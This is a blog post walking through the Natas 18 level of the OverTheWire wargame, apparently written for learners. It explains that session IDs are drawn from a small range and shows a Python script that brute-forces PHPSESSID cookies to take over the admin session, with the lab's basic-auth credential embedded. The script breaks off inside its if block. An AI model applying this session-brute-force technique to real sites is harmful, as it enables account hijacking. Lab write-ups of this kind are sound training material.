Tuesday, November 11, 2014

Natas 18

Natas 18 looks a bit different from the previous ones:

Looking through the source code, it looks like this one doesn't make use of a database and instead relies on session cookies for authentication.

 While it's a bit more code than the previous challenges, one thing that sticks out is the comment on the first line: "640 should be enough for everyone".

That's interesting.

If we intercept the POST request that gets sent when we click the Login button, you can see the PHPSESSID variable is set to 389. That matches well with our previous understanding that PHPSESSID values were drawn randomly from values < 640.

Fortunately for us, 640 is much too small of a space to be considered secure.

What would happen if we wrote a script that repeatedly sends these login requests, while filling the PHPSESSID cookie value with increasing numbers starting at 0 and going to 640?

Eventually, our PHPSESSID cookie would match the Admin's session ID cookie, and we should get his privilidges.

I wrote a quick script using the Python requests library:

import requests

for i in range(700):
    url = "http://natas18.natas.labs.overthewire.org/index.php"
    payload = {"username": "admin", "password": "aa"}
    headers = {"Cookie": "PHPSESSID={0}".format(i), "Authorization": "Basic bmF0YXMxODp4dktJcURqeTRPUHY3d0NSZ0RsbWowcEZzQ3NEamhkUA=="}

    r = requests.post(url, params=payload, headers=headers)

    if "You are logged in as a regular user" in r.text:

You can see it will try successive PHPSESSID values until it eventually doesn't find the text "You are logged in as a regular user" in the response body. (Note the username and password parameters don't really matter...)

Here's the output, and you can see it finishes successfully!

No comments:

Post a Comment